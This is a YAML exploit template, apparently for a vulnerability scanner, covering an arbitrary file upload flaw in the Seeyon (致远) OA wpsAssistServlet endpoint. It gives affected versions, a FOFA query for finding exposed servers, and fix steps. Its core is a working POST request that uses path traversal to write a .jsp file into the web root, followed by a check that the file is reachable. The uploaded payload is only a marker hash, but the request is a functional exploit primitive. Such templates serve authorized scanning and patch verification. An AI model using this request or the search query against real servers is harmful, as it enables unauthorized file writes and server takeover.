product: 致远OA
vName: 致远OA wpsAssistServlet 任意文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: 致远OA是一套办公协同管理软件。致远OA wpsAssistServlet接口存在任意文件上传漏洞，攻击者通过漏洞可以发送特定的请求包上传恶意文件，获取服务器权限。
version: 致远OA A6、A8、A8N (V8.0SP2，V8.1，V8.1SP1)、致远OA G6、G6N (V8.1、V8.1SP1)
note: 访问http(s)://xx/52e039302a62d077.jsp
search:
  FOFA: app="致远互联-OA"
protocol: http
link: https://developer.aliyun.com/article/1260378?spm=5176.26934562.main.2.2beb2d3bhMutHl
fix:
  - 对路径 /seeyon/htmlofficeservlet 进行限制访问。
  - 致远官方已发布补丁，请联系官方安装相应补丁。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/52e039302a62d077.jsp&fileId=2
      file:
        upload:
          - test.txt
          - 95cc64dd2825f9df13ec4ad683ecf339
          - application/vnd.ms-excel
    verify:
      path: /52e039302a62d077.jsp
      logic: and
      check:
        - status: 200
          body:
            value:
              - 95cc64dd2825f9df13ec4ad683ecf339
            logic: and